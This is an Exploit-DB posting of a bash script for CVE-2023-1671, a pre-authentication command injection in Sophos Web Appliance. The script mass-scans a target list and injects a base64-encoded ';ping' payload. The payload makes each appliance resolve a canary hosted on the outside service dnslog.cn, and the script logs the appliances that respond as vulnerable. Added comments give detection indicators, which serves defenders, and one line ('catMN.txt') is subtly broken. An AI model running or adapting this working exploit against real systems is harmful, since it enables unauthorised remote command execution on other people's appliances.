Sophos Web Appliance 4.3.10.4 – Pre-auth command injection

  • 作者: Behnam Abasi Vanda
    日期: 2023-04-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51396/
    #!/bin/bash
    # Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
    # Exploit Author: Behnam Abasi Vanda
    # Vendor Homepage: https://www.sophos.com
    # Version: Sophos Web Appliance older than version 4.3.10.4
    # Tested on: Ubuntu
    # CVE : CVE-2023-1671
    # Shodan Dork: title:"Sophos Web Appliance"
    # Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
    # Reference : https://vulncheck.com/blog/cve-2023-1671-analysis
    
    
    
    TARGET_LIST=$1

    # =====================
    # ANSI escape sequences used with `echo -e`; single quotes keep the
    # backslashes literal until echo -e interprets them at print time.
    BOLD='\033[1m'
    RED='\e[1;31m'
    GREEN='\e[1;32m'
    YELLOW='\e[1;33m'
    BLUE='\e[1;34m'
    NOR='\e[0m'
    # ====================
    
    
    #######################################
    # Requests a fresh out-of-band DNS canary name from www.dnslog.cn.
    # Globals:   ch (written: grep exit status), sub (written: canary name,
    #            the getdomain.php response line containing "dnslog.cn"),
    #            cookie.txt (removed, then written by curl -c so check_vuln
    #            can query the same dnslog.cn session)
    # Outputs:   progress lines on stdout
    # Defender note: the canary is the name check_vuln's payload makes the
    # appliance resolve; an outbound DNS query for a *.dnslog.cn name from a
    # web appliance is the observable indicator of this probe.
    #######################################
    get_new_subdomain()
    {
    # Gate: appears intended to fetch a new canary only when MN.txt holds
    # "YES" (see check_vuln); ch is grep's exit status, 0 when matched.
    catMN.txt | grep 'YES' >/dev/null;ch=$?
     if [ $ch -eq 0 ];then
    		echo -e "	[+] Trying to get Subdomain $NOR"
    	 rm -rf cookie.txt
    	sub=`curl -i -c cookie.txt -s -k -X $'GET' \
    -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
    	$'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn` 
    	 echo -e "	[+]$BOLD$GREEN Subdomain : $sub $NOR"
    	 fi
    }
    
    #######################################
    # Probes one host for CVE-2023-1671 and records the verdict.
    # Arguments: $1 - target host, used as https://$1
    # Globals:   sub (read: canary name from get_new_subdomain), req and ch
    #            (written), MN.txt (written: YES/NO), vulnerable.lst (appended
    #            on a hit), cookie.txt (read: dnslog.cn session)
    # Outputs:   per-host verdict line on stdout; `--trace-ascii %` makes curl
    #            write the full request/response trace, payload included, to
    #            a file literally named '%' in the working directory.
    # Detection notes: the probe is a POST to
    # /index.php?c=blocked&action=continue whose user_encoded field is the
    # base64 of shell text containing ';' and '#'; execution is confirmed only
    # by the appliance resolving the dnslog.cn canary, so that DNS query is
    # the host-side indicator. Per the header, versions older than 4.3.10.4
    # are affected.
    #######################################
    check_vuln()
    {
    # Injection request. $RANDOM fills the other form fields; -k disables TLS
    # certificate verification for the target connection.
    curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"
    
    # Fetch the records dnslog.cn has seen for the canary, reusing the session
    # cookie that get_new_subdomain saved.
    req=`curl -i -s -k -b cookie.txt -X $'GET' \
    -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
     $'http://www.dnslog.cn/getrecords.php?t=0'`
     
    # Any record line mentioning dnslog.cn is taken as a successful callback;
    # the verdict is persisted to MN.txt for get_new_subdomain's gate.
    echo "$req"| grep 'dnslog.cn' >/dev/null;ch=$?
     if [ $ch -eq 0 ];then
     	echo "YES" > MN.txt
    		echo -e "	[+]$BOLD $RED https://$1 Vulnerable :D $NOR"
    		echo "https://$1" >> vulnerable.lst			
    	else 
     		echo -e "	[-] https://$1 Not Vulnerable :| $NOR"
     		echo "NO" > MN.txt
    	 fi
    }
    
    # Banner: single-quoted, so the box-drawing art is printed verbatim with no
    # expansion.
    echo '
    
     ██████╗██╗ ██╗███████╗██████╗██████╗ ██████╗ ██████╗██╗ ██████╗███████╗
    ██╔════╝██║ ██║██╔════╝╚════██╗██╔═████╗╚════██╗╚════██╗███║██╔════╝╚════██║
    ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗██╔╝
    ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝╚═══██╗╚════╝ ██║██╔═══██╗██╔╝ 
    ╚██████╗ ╚████╔╝ ███████╗███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝██║
     ╚═════╝╚═══╝╚══════╝╚══════╝ ╚═════╝ ╚══════╝╚═════╝╚═╝ ╚═════╝ ╚═╝
    
    ██████╗ ██╗ ██╗██████╗ ███████╗██╗██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗
    ██╔══██╗╚██╗ ██╔╝██╔══██╗██╔════╝██║██║████╗██║██╔══██╗████╗ ████║██╗╚██╗ 
    ██████╔╝ ╚████╔╝ ██████╔╝█████╗███████║██╔██╗ ██║███████║██╔████╔██║╚═╝ ██║ 
    ██╔══██╗╚██╔╝██╔══██╗██╔══╝██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║▄█╗ ██║ 
    ██████╔╝ ██║ ██████╔╝███████╗██║██║██║ ╚████║██║██║██║ ╚═╝ ██║▀═╝██╔╝ 
    ╚═════╝╚═╝ ╚═════╝ ╚══════╝╚═╝╚═╝╚═╝╚═══╝╚═╝╚═╝╚═╝ ╚═╝ ╚═╝
     
    '
    # Exactly one argument (the target list file) is required; otherwise print
    # the usage text and stop with the status of the last echo (0).
    if [ "$#" -ne 1 ]; then
      printf '%s\n' " ----------------------------------------------------------------"
      printf '%s\n' "[!] please give the target list file : bash CVE-2023-1671.sh targets.txt "
      printf '%s\n' " ---------------------------------------------------------------"
      exit
    fi
    
    
    
    # Main loop. State lives in two files in the working directory: MN.txt
    # (YES/NO verdict of the last check_vuln) and cookie.txt (dnslog.cn
    # session). Seeding MN.txt with YES appears intended to make the first
    # iteration request a canary name.
    rm -rf cookie.txt
    echo "YES" > MN.txt
    # Targets are the whitespace-separated tokens of the list file; $TARGET_LIST
    # is unquoted here, so the path itself is subject to word-splitting.
    for target in `cat $TARGET_LIST`
    do
    
    get_new_subdomain;
    echo "	[~] Checking $target"
    	check_vuln "$target"
    done
    # Cleanup of the state files; the '%' trace file written by check_vuln and
    # vulnerable.lst are left behind.
    rm -rf MN.txt
    rm -rf cookie.txt